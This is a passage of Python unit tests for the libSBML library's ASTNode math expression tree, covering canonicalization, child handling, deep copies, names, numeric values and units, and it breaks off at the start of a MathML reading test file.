c = n.getLeftChild()
self.assert_( c.getType() == libsbml.AST_INTEGER )
self.assert_( c.getInteger() == 10 )
c = n.getRightChild()
self.assert_( c.getType() == libsbml.AST_NAME )
self.assert_(( "x" == c.getName() ))
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "sqr")
c = libsbml.ASTNode()
c.setName( "x")
n.addChild(c)
self.assert_( n.getType() == libsbml.AST_FUNCTION )
self.assert_( n.getNumChildren() == 1 )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_POWER )
self.assert_( n.getNumChildren() == 2 )
c = n.getLeftChild()
self.assert_( c.getType() == libsbml.AST_NAME )
self.assert_(( "x" == c.getName() ))
c = n.getRightChild()
self.assert_( c.getType() == libsbml.AST_INTEGER )
self.assert_( c.getInteger() == 2 )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "sqrt")
c = libsbml.ASTNode()
c.setName( "x")
n.addChild(c)
self.assert_( n.getType() == libsbml.AST_FUNCTION )
self.assert_( n.getNumChildren() == 1 )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_FUNCTION_ROOT )
self.assert_( n.getNumChildren() == 2 )
c = n.getLeftChild()
self.assert_( c.getType() == libsbml.AST_INTEGER )
self.assert_( c.getInteger() == 2 )
c = n.getRightChild()
self.assert_( c.getType() == libsbml.AST_NAME )
self.assert_(( "x" == c.getName() ))
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_canonicalizeLogical(self):
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "and")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_LOGICAL_AND )
n.setType(libsbml.AST_FUNCTION)
n.setName( "not")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_LOGICAL_NOT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "or")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_LOGICAL_OR )
n.setType(libsbml.AST_FUNCTION)
n.setName( "xor")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_LOGICAL_XOR )
n.setType(libsbml.AST_FUNCTION)
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_canonicalizeRelational(self):
n = libsbml.ASTNode(libsbml.AST_FUNCTION)
n.setName( "eq")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_EQ )
n.setType(libsbml.AST_FUNCTION)
n.setName( "geq")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_GEQ )
n.setType(libsbml.AST_FUNCTION)
n.setName( "gt")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_GT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "leq")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_LEQ )
n.setType(libsbml.AST_FUNCTION)
n.setName( "lt")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_LT )
n.setType(libsbml.AST_FUNCTION)
n.setName( "neq")
self.assert_( n.getType() == libsbml.AST_FUNCTION )
n.canonicalize()
self.assert_( n.getType() == libsbml.AST_RELATIONAL_NEQ )
n.setType(libsbml.AST_FUNCTION)
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
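# getLeftChild()/getRightChild() return the first and last child respectively,
# and getChild() with an out-of-range index returns None.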
def test_ASTNode_children(self):
parent = libsbml.ASTNode()
left = libsbml.ASTNode()
right = libsbml.ASTNode()
right2 = libsbml.ASTNode()
parent.setType(libsbml.AST_PLUS)
left.setValue(1)
right.setValue(2)
right2.setValue(3)
parent.addChild(left)
parent.addChild(right)
self.assert_( parent.getNumChildren() == 2 )
self.assert_( left.getNumChildren() == 0 )
self.assert_( right.getNumChildren() == 0 )
self.assert_( parent.getLeftChild() == left )
self.assert_( parent.getRightChild() == right )
self.assert_( parent.getChild(0) == left )
self.assert_( parent.getChild(1) == right )
self.assert_( parent.getChild(2) == None )
parent.addChild(right2)
self.assert_( parent.getNumChildren() == 3 )
self.assert_( left.getNumChildren() == 0 )
self.assert_( right.getNumChildren() == 0 )
self.assert_( right2.getNumChildren() == 0 )
self.assert_( parent.getLeftChild() == left )
self.assert_( parent.getRightChild() == right2 )
self.assert_( parent.getChild(0) == left )
self.assert_( parent.getChild(1) == right )
self.assert_( parent.getChild(2) == right2 )
self.assert_( parent.getChild(3) == None )
_dummyList = [ parent ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_create(self):
n = libsbml.ASTNode()
ea = libsbml.EventAssignment(2,4)
self.assert_( n.getType() == libsbml.AST_UNKNOWN )
self.assert_( n.getCharacter() == "\0" )
self.assert_( n.getName() == None )
self.assert_( n.getInteger() == 0 )
self.assert_( n.getExponent() == 0 )
self.assert_( n.getNumChildren() == 0 )
self.assert_( n.getParentSBMLObject() == None )
_dummyList = [ ea ]; _dummyList[:] = []; del _dummyList
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
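# deepCopy() must return a structurally identical tree whose nodes are all
# distinct objects from the originals.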
def test_ASTNode_deepCopy_1(self):
node = libsbml.ASTNode()
node.setCharacter( '+')
node.addChild(libsbml.ASTNode())
node.addChild(libsbml.ASTNode())
node.getLeftChild().setValue(1)
node.getRightChild().setValue(2)
self.assert_( node.getType() == libsbml.AST_PLUS )
self.assert_( node.getCharacter() == '+' )
self.assert_( node.getNumChildren() == 2 )
child = node.getLeftChild()
self.assert_( child.getType() == libsbml.AST_INTEGER )
self.assert_( child.getInteger() == 1 )
self.assert_( child.getNumChildren() == 0 )
child = node.getRightChild()
self.assert_( child.getType() == libsbml.AST_INTEGER )
self.assert_( child.getInteger() == 2 )
self.assert_( child.getNumChildren() == 0 )
copy = node.deepCopy()
self.assert_( copy != node )
self.assert_( copy.getType() == libsbml.AST_PLUS )
self.assert_( copy.getCharacter() == '+' )
self.assert_( copy.getNumChildren() == 2 )
child = copy.getLeftChild()
self.assert_( child != node.getLeftChild() )
self.assert_( child.getType() == libsbml.AST_INTEGER )
self.assert_( child.getInteger() == 1 )
self.assert_( child.getNumChildren() == 0 )
child = copy.getRightChild()
self.assert_( child != node.getRightChild() )
self.assert_( child.getType() == libsbml.AST_INTEGER )
self.assert_( child.getInteger() == 2 )
self.assert_( child.getNumChildren() == 0 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ copy ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_deepCopy_2(self):
node = libsbml.ASTNode()
node.setName( "Foo")
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_(( "Foo" == node.getName() ))
self.assert_( node.getNumChildren() == 0 )
copy = node.deepCopy()
self.assert_( copy != node )
self.assert_( copy.getType() == libsbml.AST_NAME )
self.assert_(( "Foo" == copy.getName() ))
self.assert_( copy.getNumChildren() == 0 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ copy ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_deepCopy_3(self):
node = libsbml.ASTNode(libsbml.AST_FUNCTION)
node.setName( "Foo")
self.assert_( node.getType() == libsbml.AST_FUNCTION )
self.assert_(( "Foo" == node.getName() ))
self.assert_( node.getNumChildren() == 0 )
copy = node.deepCopy()
self.assert_( copy != node )
self.assert_( copy.getType() == libsbml.AST_FUNCTION )
self.assert_(( "Foo" == copy.getName() ))
self.assert_( copy.getNumChildren() == 0 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ copy ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_deepCopy_4(self):
node = libsbml.ASTNode(libsbml.AST_FUNCTION_ABS)
node.setName( "ABS")
self.assert_( node.getType() == libsbml.AST_FUNCTION_ABS )
self.assert_(( "ABS" == node.getName() ))
self.assert_( node.getNumChildren() == 0 )
copy = node.deepCopy()
self.assert_( copy != node )
self.assert_( copy.getType() == libsbml.AST_FUNCTION_ABS )
self.assert_(( "ABS" == copy.getName() ))
self.assert_( copy.getNumChildren() == 0 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
_dummyList = [ copy ]; _dummyList[:] = []; del _dummyList
pass
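# freeName() releases the stored name; a second call, or a call on a node type
# that carries no name, returns LIBSBML_UNEXPECTED_ATTRIBUTE.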
def test_ASTNode_freeName(self):
node = libsbml.ASTNode()
i = 0
i = node.setName( "a")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_(( "a" == libsbml.formulaToString(node) ))
self.assert_(( "a" == node.getName() ))
i = node.freeName()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getName() == None )
i = node.freeName()
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
self.assert_( node.getName() == None )
node.setType(libsbml.AST_UNKNOWN)
i = node.freeName()
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
self.assert_( node.getName() == None )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
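# For operator, constant and built-in function types, getName() falls back to
# the canonical SBML name (e.g. "exponentiale", "delay", "and") unless a
# user-defined name overrides it.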
def test_ASTNode_getName(self):
n = libsbml.ASTNode()
n.setName( "foo")
self.assert_(( "foo" == n.getName() ))
n.setType(libsbml.AST_NAME_TIME)
self.assert_(( "foo" == n.getName() ))
n.setName(None)
self.assert_( n.getName() == None )
n.setType(libsbml.AST_CONSTANT_E)
self.assert_(( "exponentiale" == n.getName() ))
n.setType(libsbml.AST_CONSTANT_FALSE)
self.assert_(( "false" == n.getName() ))
n.setType(libsbml.AST_CONSTANT_PI)
self.assert_(( "pi" == n.getName() ))
n.setType(libsbml.AST_CONSTANT_TRUE)
self.assert_(( "true" == n.getName() ))
n.setType(libsbml.AST_LAMBDA)
self.assert_(( "lambda" == n.getName() ))
n.setType(libsbml.AST_FUNCTION)
n.setName( "f")
self.assert_(( "f" == n.getName() ))
n.setType(libsbml.AST_FUNCTION_DELAY)
self.assert_(( "f" == n.getName() ))
n.setName(None)
self.assert_(( "delay" == n.getName() ))
n.setType(libsbml.AST_FUNCTION)
self.assert_( n.getName() == None )
n.setType(libsbml.AST_FUNCTION_ABS)
self.assert_(( "abs" == n.getName() ))
n.setType(libsbml.AST_FUNCTION_ARCCOS)
self.assert_(( "arccos" == n.getName() ))
n.setType(libsbml.AST_FUNCTION_TAN)
self.assert_(( "tan" == n.getName() ))
n.setType(libsbml.AST_FUNCTION_TANH)
self.assert_(( "tanh" == n.getName() ))
n.setType(libsbml.AST_LOGICAL_AND)
self.assert_(( "and" == n.getName() ))
n.setType(libsbml.AST_LOGICAL_NOT)
self.assert_(( "not" == n.getName() ))
n.setType(libsbml.AST_LOGICAL_OR)
self.assert_(( "or" == n.getName() ))
n.setType(libsbml.AST_LOGICAL_XOR)
self.assert_(( "xor" == n.getName() ))
n.setType(libsbml.AST_RELATIONAL_EQ)
self.assert_(( "eq" == n.getName() ))
n.setType(libsbml.AST_RELATIONAL_GEQ)
self.assert_(( "geq" == n.getName() ))
n.setType(libsbml.AST_RELATIONAL_LT)
self.assert_(( "lt" == n.getName() ))
n.setType(libsbml.AST_RELATIONAL_NEQ)
self.assert_(( "neq" == n.getName() ))
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_getPrecedence(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_PLUS)
self.assert_( n.getPrecedence() == 2 )
n.setType(libsbml.AST_MINUS)
self.assert_( n.getPrecedence() == 2 )
n.setType(libsbml.AST_TIMES)
self.assert_( n.getPrecedence() == 3 )
n.setType(libsbml.AST_DIVIDE)
self.assert_( n.getPrecedence() == 3 )
n.setType(libsbml.AST_POWER)
self.assert_( n.getPrecedence() == 4 )
n.setType(libsbml.AST_MINUS)
n.addChild(libsbml.ASTNode(libsbml.AST_NAME))
self.assert_( n.isUMinus() == True )
self.assert_( n.getPrecedence() == 5 )
n.setType(libsbml.AST_NAME)
self.assert_( n.getPrecedence() == 6 )
n.setType(libsbml.AST_FUNCTION)
self.assert_( n.getPrecedence() == 6 )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_getReal(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_REAL)
n.setValue(1.6)
self.assert_( n.getReal() == 1.6 )
n.setType(libsbml.AST_REAL_E)
n.setValue(12.3,3)
val = abs(n.getReal() - 12300.0)
self.assert_( val < DBL_EPSILON )
n.setType(libsbml.AST_RATIONAL)
n.setValue(1,2)
self.assert_( n.getReal() == 0.5 )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_insertChild(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
c3 = libsbml.ASTNode()
newc = libsbml.ASTNode()
newc1 = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_LOGICAL_AND)
c1.setName( "a")
c2.setName( "b")
c3.setName( "c")
node.addChild(c1)
node.addChild(c2)
node.addChild(c3)
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(a, b, c)" == libsbml.formulaToString(node) ))
newc.setName( "d")
newc1.setName( "e")
i = node.insertChild(1,newc)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 4 )
self.assert_(( "and(a, d, b, c)" == libsbml.formulaToString(node) ))
i = node.insertChild(5,newc)
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( node.getNumChildren() == 4 )
self.assert_(( "and(a, d, b, c)" == libsbml.formulaToString(node) ))
i = node.insertChild(2,newc1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 5 )
self.assert_(( "and(a, d, e, b, c)" == libsbml.formulaToString(node) ))
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_isLog10(self):
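# isLog10 is True only for an AST_FUNCTION_LOG node with exactly two
# children whose first child (the log base) has the value 10.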
n = libsbml.ASTNode()
n.setType(libsbml.AST_FUNCTION)
self.assert_( n.isLog10() == False )
n.setType(libsbml.AST_FUNCTION_LOG)
self.assert_( n.isLog10() == False )
c = libsbml.ASTNode()
n.addChild(c)
c.setValue(10)
self.assert_( n.isLog10() == False )
n.addChild(libsbml.ASTNode())
self.assert_( n.isLog10() == True )
c.setValue(2)
self.assert_( n.isLog10() == False )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_isSqrt(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_FUNCTION)
self.assert_( n.isSqrt() == False )
n.setType(libsbml.AST_FUNCTION_ROOT)
self.assert_( n.isSqrt() == False )
c = libsbml.ASTNode()
n.addChild(c)
c.setValue(2)
self.assert_( n.isSqrt() == False )
n.addChild(libsbml.ASTNode())
self.assert_( n.isSqrt() == True )
c.setValue(3)
self.assert_( n.isSqrt() == False )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_isUMinus(self):
n = libsbml.ASTNode()
n.setType(libsbml.AST_MINUS)
self.assert_( n.isUMinus() == False )
n.addChild(libsbml.ASTNode(libsbml.AST_NAME))
self.assert_( n.isUMinus() == True )
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_no_children(self):
node = libsbml.ASTNode()
self.assert_( node.getNumChildren() == 0 )
self.assert_( node.getLeftChild() == None )
self.assert_( node.getRightChild() == None )
self.assert_( node.getChild(0) == None )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_one_child(self):
node = libsbml.ASTNode()
child = libsbml.ASTNode()
node.addChild(child)
self.assert_( node.getNumChildren() == 1 )
self.assert_( node.getLeftChild() == child )
self.assert_( node.getRightChild() == None )
self.assert_( node.getChild(0) == child )
self.assert_( node.getChild(1) == None )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_prependChild1(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
c1_1 = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_LOGICAL_AND)
c1.setName( "a")
c2.setName( "b")
node.addChild(c1)
node.addChild(c2)
self.assert_( node.getNumChildren() == 2 )
self.assert_(( "and(a, b)" == libsbml.formulaToString(node) ))
c1_1.setName( "d")
i = node.prependChild(c1_1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(d, a, b)" == libsbml.formulaToString(node) ))
self.assert_(( "d" == node.getChild(0).getName() ))
self.assert_(( "a" == node.getChild(1).getName() ))
self.assert_(( "b" == node.getChild(2).getName() ))
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_removeChild(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_PLUS)
c1.setName( "foo")
c2.setName( "foo2")
node.addChild(c1)
node.addChild(c2)
self.assert_( node.getNumChildren() == 2 )
i = node.removeChild(0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 1 )
i = node.removeChild(1)
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( node.getNumChildren() == 1 )
i = node.removeChild(0)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 0 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_replaceChild(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
c3 = libsbml.ASTNode()
newc = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_LOGICAL_AND)
c1.setName( "a")
c2.setName( "b")
c3.setName( "c")
node.addChild(c1)
node.addChild(c2)
node.addChild(c3)
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(a, b, c)" == libsbml.formulaToString(node) ))
newc.setName( "d")
i = node.replaceChild(0,newc)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(d, b, c)" == libsbml.formulaToString(node) ))
i = node.replaceChild(3,newc)
self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE )
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(d, b, c)" == libsbml.formulaToString(node) ))
i = node.replaceChild(1,c1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 3 )
self.assert_(( "and(d, a, c)" == libsbml.formulaToString(node) ))
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setCharacter(self):
node = libsbml.ASTNode()
node.setName( "foo")
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_( node.getCharacter() == "\0" )
self.assert_(( "foo" == node.getName() ))
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '+')
self.assert_( node.getType() == libsbml.AST_PLUS )
self.assert_( node.getCharacter() == '+' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '-')
self.assert_( node.getType() == libsbml.AST_MINUS )
self.assert_( node.getCharacter() == '-' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '*')
self.assert_( node.getType() == libsbml.AST_TIMES )
self.assert_( node.getCharacter() == '*' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '/')
self.assert_( node.getType() == libsbml.AST_DIVIDE )
self.assert_( node.getCharacter() == '/' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '^')
self.assert_( node.getType() == libsbml.AST_POWER )
self.assert_( node.getCharacter() == '^' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setCharacter( '$')
self.assert_( node.getType() == libsbml.AST_UNKNOWN )
self.assert_( node.getCharacter() == '$' )
self.assert_( node.getName() == None )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setInteger(self):
node = libsbml.ASTNode()
node.setName( "foo")
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_(( "foo" == node.getName() ))
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setValue(3.2)
self.assert_( node.getType() == libsbml.AST_REAL )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getName() == None )
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getReal() == 3.2 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setValue(321)
self.assert_( node.getType() == libsbml.AST_INTEGER )
self.assert_( node.getInteger() == 321 )
self.assert_( node.getName() == None )
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setName(self):
name = "foo"
node = libsbml.ASTNode()
self.assert_( node.getType() == libsbml.AST_UNKNOWN )
node.setName(name)
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_(( name == node.getName() ))
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
if (node.getName() == name):
pass
node.setName(None)
self.assert_( node.getType() == libsbml.AST_NAME )
if (node.getName() != None):
pass
node.setType(libsbml.AST_FUNCTION_COS)
self.assert_( node.getType() == libsbml.AST_FUNCTION_COS )
self.assert_(( "cos" == node.getName() ))
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
node.setType(libsbml.AST_PLUS)
node.setName(name)
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_(( name == node.getName() ))
self.assert_( node.getCharacter() == '+' )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getReal() == 0 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setName_override(self):
node = libsbml.ASTNode(libsbml.AST_FUNCTION_SIN)
self.assert_(( "sin" == node.getName() ))
self.assert_( node.getType() == libsbml.AST_FUNCTION_SIN )
node.setName( "MySinFunc")
self.assert_(( "MySinFunc" == node.getName() ))
self.assert_( node.getType() == libsbml.AST_FUNCTION_SIN )
node.setName(None)
self.assert_(( "sin" == node.getName() ))
self.assert_( node.getType() == libsbml.AST_FUNCTION_SIN )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setReal(self):
node = libsbml.ASTNode()
node.setName( "foo")
self.assert_( node.getType() == libsbml.AST_NAME )
node.setValue(32.1)
self.assert_( node.getType() == libsbml.AST_REAL )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getName() == None )
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getReal() == 32.1 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 1 )
self.assert_( node.getMantissa() == 32.1 )
node.setValue(45,90)
self.assert_( node.getType() == libsbml.AST_RATIONAL )
self.assert_( node.getInteger() == 45 )
self.assert_( node.getName() == None )
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getReal() == 0.5 )
self.assert_( node.getExponent() == 0 )
self.assert_( node.getDenominator() == 90 )
self.assert_( node.getMantissa() == 0 )
node.setValue(32.0,4)
self.assert_( node.getType() == libsbml.AST_REAL_E )
self.assert_( node.getInteger() == 0 )
self.assert_( node.getName() == None )
self.assert_( node.getCharacter() == "\0" )
self.assert_( node.getReal() == 320000 )
self.assert_( node.getExponent() == 4 )
self.assert_( node.getDenominator() == 1 )
self.assert_( node.getMantissa() == 32 )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_setType(self):
node = libsbml.ASTNode()
node.setName( "foo")
self.assert_( node.getType() == libsbml.AST_NAME )
node.setType(libsbml.AST_FUNCTION)
self.assert_( node.getType() == libsbml.AST_FUNCTION )
self.assert_(( "foo" == node.getName() ))
node.setType(libsbml.AST_NAME)
self.assert_( node.getType() == libsbml.AST_NAME )
self.assert_(( "foo" == node.getName() ))
node.setType(libsbml.AST_INTEGER)
self.assert_( node.getType() == libsbml.AST_INTEGER )
node.setType(libsbml.AST_REAL)
self.assert_( node.getType() == libsbml.AST_REAL )
node.setType(libsbml.AST_UNKNOWN)
self.assert_( node.getType() == libsbml.AST_UNKNOWN )
node.setType(libsbml.AST_PLUS)
self.assert_( node.getType() == libsbml.AST_PLUS )
self.assert_( node.getCharacter() == '+' )
node.setType(libsbml.AST_MINUS)
self.assert_( node.getType() == libsbml.AST_MINUS )
self.assert_( node.getCharacter() == '-' )
node.setType(libsbml.AST_TIMES)
self.assert_( node.getType() == libsbml.AST_TIMES )
self.assert_( node.getCharacter() == '*' )
node.setType(libsbml.AST_DIVIDE)
self.assert_( node.getType() == libsbml.AST_DIVIDE )
self.assert_( node.getCharacter() == '/' )
node.setType(libsbml.AST_POWER)
self.assert_( node.getType() == libsbml.AST_POWER )
self.assert_( node.getCharacter() == '^' )
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_swapChildren(self):
node = libsbml.ASTNode()
c1 = libsbml.ASTNode()
c2 = libsbml.ASTNode()
node_1 = libsbml.ASTNode()
c1_1 = libsbml.ASTNode()
c2_1 = libsbml.ASTNode()
i = 0
node.setType(libsbml.AST_LOGICAL_AND)
c1.setName( "a")
c2.setName( "b")
node.addChild(c1)
node.addChild(c2)
self.assert_( node.getNumChildren() == 2 )
self.assert_(( "and(a, b)" == libsbml.formulaToString(node) ))
node_1.setType(libsbml.AST_LOGICAL_AND)
c1_1.setName( "d")
c2_1.setName( "f")
node_1.addChild(c1_1)
node_1.addChild(c2_1)
self.assert_( node_1.getNumChildren() == 2 )
self.assert_(( "and(d, f)" == libsbml.formulaToString(node_1) ))
i = node.swapChildren(node_1)
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( node.getNumChildren() == 2 )
self.assert_(( "and(d, f)" == libsbml.formulaToString(node) ))
self.assert_( node_1.getNumChildren() == 2 )
self.assert_(( "and(a, b)" == libsbml.formulaToString(node_1) ))
_dummyList = [ node_1 ]; _dummyList[:] = []; del _dummyList
_dummyList = [ node ]; _dummyList[:] = []; del _dummyList
pass
def test_ASTNode_units(self):
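# Units can only be attached to numeric (<cn>) nodes, and the unit
# string must be a valid SBML identifier (so "1mole" is rejected).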
n = libsbml.ASTNode()
n.setType(libsbml.AST_REAL)
n.setValue(1.6)
i = n.setUnits( "mole")
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( n.isSetUnits() == True )
self.assert_(( "mole" == n.getUnits() ))
i = n.unsetUnits()
self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS )
self.assert_( n.isSetUnits() == False )
self.assert_(( "" == n.getUnits() ))
i = n.setUnits( "1mole")
self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE )
self.assert_( n.isSetUnits() == False )
n.setType(libsbml.AST_FUNCTION)
i = n.setUnits( "mole")
self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE )
self.assert_( n.isSetUnits() == False )
self.assert_(( "" == n.getUnits() ))
_dummyList = [ n ]; _dummyList[:] = []; del _dummyList
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestASTNode))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
```
#### File: test/math/TestReadMathML.py
```python
import sys
import unittest
import libsbml
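# Numeric helpers: NaN and +/-infinity are produced portably by
# overflowing a large double, mirroring the C test utilities.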
def util_isInf(x):
return x == util_PosInf() or x == util_NegInf()
def util_NaN():
